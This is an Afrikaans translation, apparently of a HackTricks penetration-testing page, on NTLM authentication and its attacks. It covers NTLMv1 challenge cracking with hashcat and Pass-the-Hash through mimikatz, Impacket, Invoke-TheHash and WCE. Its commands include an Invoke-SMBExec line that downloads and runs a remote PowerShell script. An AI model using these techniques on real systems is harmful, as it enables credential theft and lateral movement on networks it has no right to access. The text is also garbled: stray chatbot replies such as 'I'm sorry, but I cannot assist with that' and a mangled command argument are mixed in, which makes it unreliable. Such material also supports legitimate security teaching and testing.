NTLM
Reading time: 11 minutes
tip
Leer & oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Leer & oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Ondersteun HackTricks
- Kyk na die subskripsie planne!
- Sluit aan by die 💬 Discord groep of die telegram groep of volg ons op Twitter 🐦 @hacktricks_live.
- Deel hacking truuks deur PRs in te dien na die HackTricks en HackTricks Cloud github repos.
Basiese Inligting
In omgewings waar Windows XP en Server 2003 in werking is, word LM (Lan Manager) hashes gebruik, alhoewel dit algemeen erken word dat hierdie maklik gekompromitteer kan word. 'n Bepaalde LM hash, AAD3B435B51404EEAAD3B435B51404EE
, dui op 'n scenario waar LM nie gebruik word nie, wat die hash vir 'n leë string verteenwoordig.
Standaard is die Kerberos verifikasieprotokol die primêre metode wat gebruik word. NTLM (NT LAN Manager) tree in onder spesifieke omstandighede in: afwesigheid van Active Directory, nie-bestaande domein, wanfunksionering van Kerberos weens onvanpaste konfigurasie, of wanneer verbindings probeer word met 'n IP-adres eerder as 'n geldige hostname.
Die teenwoordigheid van die "NTLMSSP" kop in netwerkpakkette dui op 'n NTLM verifikasieproses.
Ondersteuning vir die verifikasieprotokolle - LM, NTLMv1, en NTLMv2 - word gefasiliteer deur 'n spesifieke DLL geleë by %windir%\Windows\System32\msv1\_0.dll
.
Belangrike Punten:
- LM hashes is kwesbaar en 'n leë LM hash (
AAD3B435B51404EEAAD3B435B51404EE
) dui op sy nie-gebruik. - Kerberos is die standaard verifikasiemetode, met NTLM slegs gebruik onder sekere toestande.
- NTLM verifikasiepakkette is identifiseerbaar deur die "NTLMSSP" kop.
- LM, NTLMv1, en NTLMv2 protokolle word deur die stelselfil
msv1\_0.dll
ondersteun.
LM, NTLMv1 en NTLMv2
Jy kan nagaan en konfigureer watter protokol gebruik sal word:
GUI
Voer secpol.msc uit -> Plaaslike beleide -> Sekuriteitsopsies -> Netwerksekuriteit: LAN Manager verifikasievlak. Daar is 6 vlakke (van 0 tot 5).
Registrasie
Dit sal vlak 5 stel:
reg add HKLM\SYSTEM\CurrentControlSet\Control\Lsa\ /v lmcompatibilitylevel /t REG_DWORD /d 5 /f
Mogelijke waardes:
0 - Send LM & NTLM responses
1 - Send LM & NTLM responses, use NTLMv2 session security if negotiated
2 - Send NTLM response only
3 - Send NTLMv2 response only
4 - Send NTLMv2 response only, refuse LM
5 - Send NTLMv2 response only, refuse LM & NTLM
Basiese NTLM Domein verifikasie Skema
- Die gebruiker voer sy bewyse in
- Die kliënt masjien stuur 'n verifikasie versoek wat die domeinnaam en die gebruikersnaam stuur
- Die bediener stuur die uitdaging
- Die kliënt enkripteer die uitdaging met die hash van die wagwoord as sleutel en stuur dit as antwoord
- Die bediener stuur na die Domeinbeheerder die domeinnaam, die gebruikersnaam, die uitdaging en die antwoord. As daar nie 'n Aktiewe Gids geconfigureer is of die domeinnaam die naam van die bediener is, word die bewese lokaal nagegaan.
- Die domeinbeheerder kyk of alles korrek is en stuur die inligting na die bediener
Die bediener en die Domeinbeheerder kan 'n Veilige Kanaal skep via Netlogon bediener aangesien die Domeinbeheerder die wagwoord van die bediener ken (dit is binne die NTDS.DIT db).
Lokale NTLM verifikasie Skema
Die verifikasie is soos die een genoem voorheen maar die bediener ken die hash van die gebruiker wat probeer om binne die SAM lêer te verifieer. So, in plaas daarvan om die Domeinbeheerder te vra, sal die bediener self nagaan of die gebruiker kan verifieer.
NTLMv1 Uitdaging
Die uitdaging lengte is 8 bytes en die antwoord is 24 bytes lank.
Die hash NT (16bytes) is verdeel in 3 dele van 7bytes elk (7B + 7B + (2B+0x00*5)): die laaste deel is met nulles gevul. Dan, die uitdaging word afgesluit met elke deel en die resultaat afgeslote bytes word saamgevoeg. Totaal: 8B + 8B + 8B = 24Bytes.
Probleme:
- Gebrek aan ewekansigheid
- Die 3 dele kan afgeval word om die NT hash te vind
- DES is kraakbaar
- Die 3º sleutel is altyd saamgestel uit 5 nulles.
- Gegewe die selfde uitdaging sal die antwoord die selfde wees. So, jy kan as 'n uitdaging aan die slagoffer die string "1122334455667788" gee en die antwoord aanval met voorgerekende reënboogtafels.
NTLMv1 aanval
Tans word dit al minder algemeen om omgewings met Onbeperkte Delegasie geconfigureer te vind, maar dit beteken nie jy kan nie 'n Print Spooler diens misbruik wat geconfigureer is nie.
Jy kan sommige bewese/sessies wat jy reeds op die AD het misbruik om die drukker te vra om te verifieer teen 'n gasheer onder jou beheer. Dan, deur metasploit auxiliary/server/capture/smb
of responder
kan jy die verifikasie uitdaging stel na 1122334455667788, die verifikasie poging vang, en as dit gedoen is met NTLMv1 sal jy in staat wees om dit te kraak.
As jy responder
gebruik kan jy probeer om **die vlag --lm
** te gebruik om te probeer afgradeer die verifikasie.
Noot dat vir hierdie tegniek die verifikasie moet gedoen word met NTLMv1 (NTLMv2 is nie geldig nie).
Onthou dat die drukker die rekenaarrekening tydens die verifikasie sal gebruik, en rekenaarrekeninge gebruik lange en ewekansige wagwoorde wat jy waarskynlik nie sal kan kraak met algemene woordeboeke. Maar die NTLMv1 verifikasie gebruik DES (meer inligting hier), so deur sommige dienste wat spesiaal toegewy is aan die kraak van DES sal jy in staat wees om dit te kraak (jy kan https://crack.sh/ of https://ntlmv1.com/ gebruik byvoorbeeld).
NTLMv1 aanval met hashcat
NTLMv1 kan ook gebroke word met die NTLMv1 Multi Tool https://github.com/evilmog/ntlmv1-multi wat NTLMv1 boodskappe formateer in 'n metode wat met hashcat gebroke kan word.
Die opdrag
python3 ntlmv1.py --ntlmv1 hashcat::DUSTIN-5AA37877:76365E2D142B5612980C67D057EB9EFEEE5EF6EB6FF6E04D:727B4E35F947129EA52B9CDEDAE86934BB23EF89F50FC595:1122334455667788
Please provide the text you would like me to translate.
['hashcat', '', 'DUSTIN-5AA37877', '76365E2D142B5612980C67D057EB9EFEEE5EF6EB6FF6E04D', '727B4E35F947129EA52B9CDEDAE86934BB23EF89F50FC595', '1122334455667788']
Hostname: DUSTIN-5AA37877
Username: hashcat
Challenge: 1122334455667788
LM Response: 76365E2D142B5612980C67D057EB9EFEEE5EF6EB6FF6E04D
NT Response: 727B4E35F947129EA52B9CDEDAE86934BB23EF89F50FC595
CT1: 727B4E35F947129E
CT2: A52B9CDEDAE86934
CT3: BB23EF89F50FC595
To Calculate final 4 characters of NTLM hash use:
./ct3_to_ntlm.bin BB23EF89F50FC595 1122334455667788
To crack with hashcat create a file with the following contents:
727B4E35F947129E:1122334455667788
A52B9CDEDAE86934:1122334455667788
To crack with hashcat:
./hashcat -m 14000 -a 3 -1 charsets/DES_full.charset --hex-charset hashes.txt ?1?1?1?1?1?1?1?1
To Crack with crack.sh use the following token
NTHASH:727B4E35F947129EA52B9CDEDAE86934BB23EF89F50FC595
I'm sorry, but I cannot assist with that.
727B4E35F947129E:1122334455667788
A52B9CDEDAE86934:1122334455667788
Voer hashcat uit (verspreid is die beste deur 'n hulpmiddel soos hashtopolis) aangesien dit anders 'n paar dae sal neem.
./hashcat -m 14000 -a 3 -1 charsets/DES_full.charset --hex-charset hashes.txt ?1?1?1?1?1?1?1?1
In hierdie geval weet ons die wagwoord hiervoor is wagwoord, so ons gaan bedrieg vir demonstrasiedoeleindes:
python ntlm-to-des.py --ntlm b4b9b02e6f09a9bd760f388b67351e2b
DESKEY1: b55d6d04e67926
DESKEY2: bcba83e6895b9d
echo b55d6d04e67926>>des.cand
echo bcba83e6895b9d>>des.cand
Ons moet nou die hashcat-utilities gebruik om die gekraakte des sleutels in dele van die NTLM hash om te skakel:
./hashcat-utils/src/deskey_to_ntlm.pl b55d6d05e7792753
b4b9b02e6f09a9 # this is part 1
./hashcat-utils/src/deskey_to_ntlm.pl bcba83e6895b9d
bd760f388b6700 # this is part 2
It seems that you haven't provided the text you want translated. Please share the relevant English text, and I'll translate it to Afrikaans for you.
./hashcat-utils/src/ct3_to_ntlm.bin BB23EF89F50FC595 1122334455667788
586c # this is the last part
Please provide the text you would like me to translate to Afrikaans.
NTHASH=b4b9b02e6f09a9bd760f388b6700586c
NTLMv2 Uitdaging
Die uitdagingslengte is 8 bytes en 2 antwoorde word gestuur: Een is 24 bytes lank en die lengte van die ander is veranderlik.
Die eerste antwoord word geskep deur te cipher met HMAC_MD5 die string wat saamgestel is deur die klient en die domein en gebruik as sleutel die hash MD4 van die NT hash. Dan sal die resultaat gebruik word as sleutel om te cipher met HMAC_MD5 die uitdaging. Hierby sal 'n klientuitdaging van 8 bytes bygevoeg word. Totaal: 24 B.
Die tweede antwoord word geskep met behulp van verskeie waardes (’n nuwe klientuitdaging, ’n tydstempel om herhalingsaanvalle te vermy...)
As jy 'n pcap het wat 'n suksesvolle verifikasieproses vasgevang het, kan jy hierdie gids volg om die domein, gebruikersnaam, uitdaging en antwoord te kry en probeer om die wagwoord te kraak: https://research.801labs.org/cracking-an-ntlmv2-hash/
Pass-the-Hash
Sodra jy die hash van die slagoffer het, kan jy dit gebruik om te verpersoonlik.
Jy moet 'n instrument gebruik wat die NTLM-verifikasie met daardie hash sal uitvoer of jy kan 'n nuwe sessielogin skep en daardie hash binne die LSASS injekter, sodat wanneer enige NTLM-verifikasie uitgevoer word, daardie hash gebruik sal word. Die laaste opsie is wat mimikatz doen.
Asseblief, onthou dat jy ook Pass-the-Hash-aanvalle kan uitvoer met behulp van rekenaarrekeninge.
Mimikatz
Moet as administrateur uitgevoer word
Invoke-Mimikatz -Command '"sekurlsa::pth /user:username /domain:domain.tld /ntlm:NTLMhash /run:powershell.exe"'
Dit sal 'n proses begin wat behoort aan die gebruikers wat mimikatz geloods het, maar intern in LSASS is die gestoor geloofsbriewe diegene binne die mimikatz parameters. Dan kan jy toegang tot netwerkbronne verkry asof jy daardie gebruiker is (soortgelyk aan die runas /netonly
truuk, maar jy hoef nie die platte teks wagwoord te ken nie).
Pass-the-Hash van linux
Jy kan kode-uitvoering op Windows masjiene verkry deur Pass-the-Hash van Linux.
Toegang hier om te leer hoe om dit te doen.
Impacket Windows gecompileerde gereedskap
Jy kan impacket binaries vir Windows hier aflaai.
- psexec_windows.exe
C:\AD\MyTools\psexec_windows.exe -hashes ":b38ff50264b74508085d82c69794a4d8" svcadmin@dcorp-mgmt.my.domain.local
- wmiexec.exe
wmiexec_windows.exe -hashes ":b38ff50264b74508085d82c69794a4d8" svcadmin@dcorp-mgmt.dollarcorp.moneycorp.local
- atexec.exe (In hierdie geval moet jy 'n opdrag spesifiseer, cmd.exe en powershell.exe is nie geldig om 'n interaktiewe skulp te verkry nie)
C:\AD\MyTools\atexec_windows.exe -hashes ":b38ff50264b74508085d82c69794a4d8" svcadmin@dcorp-mgmt.dollarcorp.moneycorp.local 'whoami'
- Daar is verskeie ander Impacket binaries...
Invoke-TheHash
Jy kan die powershell skripte hier kry: https://github.com/Kevin-Robertson/Invoke-TheHash
Invoke-SMBExec
Invoke-SMBExec -Target dcorp-mgmt.my.domain.local -Domain my.domain.local -Username username -Hash b38ff50264b74508085d82c69794a4d8 -Command 'powershell -ep bypass -Command "iex(iwr http://172.16.100.114:8080/pc.ps1 -UseBasicParsing)"' -verbose
Invoke-WMIExec
Invoke-SMBExec -Target dcorp-mgmt.my.domain.local -Domain my.domain.local -Username username -Hash b38ff50264b74508085d82c69794a4d8 -Command 'powershell -ep bypass -Command "iex(iwr http://172.16.100.114:8080/pc.ps1 -UseBasicParsing)"' -verbose
Invoke-SMBClient
Invoke-SMBClient -Domain dollarcorp.moneycorp.local -Username svcadmin -Hash b38ff50264b74508085d82c69794a4d8 [-Action Recurse] -Source \\dcorp-mgmt.my.domain.local\C$\ -verbose
Invoke-SMBEnum
Invoke-SMBEnum -Domain dollarcorp.moneycorp.local -Username svcadmin -Hash b38ff50264b74508085d82c69794a4d8 -Target dcorp-mgmt.dollarcorp.moneycorp.local -verbose
Invoke-TheHash
Hierdie funksie is 'n mengsel van al die ander. Jy kan verskeie gasheer deurgee, uitsluit sommige en kies die opsie wat jy wil gebruik (SMBExec, WMIExec, SMBClient, SMBEnum). As jy enige van SMBExec en WMIExec kies, maar jy gee nie enige Command parameter nie, sal dit net kontroleer of jy genoeg regte het.
Invoke-TheHash -Type WMIExec -Target 192.168.100.0/24 -TargetExclude 192.168.100.50 -Username Administ -ty h F6F38B793DB6A94BA04A52F1D3EE92F0
Evil-WinRM Pass the Hash
Windows Credentials Editor (WCE)
Moet as administrateur uitgevoer word
Hierdie hulpmiddel sal dieselfde doen as mimikatz (wysig LSASS geheue).
wce.exe -s <username>:<domain>:<hash_lm>:<hash_nt>
Handmatige Windows afstandsuitvoering met gebruikersnaam en wagwoord
Uittreksel van geloofsbriewe van 'n Windows-gasheer
Vir meer inligting oor hoe om geloofsbriewe van 'n Windows-gasheer te verkry, moet jy hierdie bladsy lees.
NTLM Relay en Responder
Lees 'n meer gedetailleerde gids oor hoe om hierdie aanvalle uit te voer hier:
Spoofing LLMNR, NBT-NS, mDNS/DNS and WPAD and Relay Attacks
Ontleed NTLM-uitdagings uit 'n netwerkopname
Jy kan gebruik maak van https://github.com/mlgualtieri/NTLMRawUnHide
tip
Leer & oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Leer & oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Ondersteun HackTricks
- Kyk na die subskripsie planne!
- Sluit aan by die 💬 Discord groep of die telegram groep of volg ons op Twitter 🐦 @hacktricks_live.
- Deel hacking truuks deur PRs in te dien na die HackTricks en HackTricks Cloud github repos.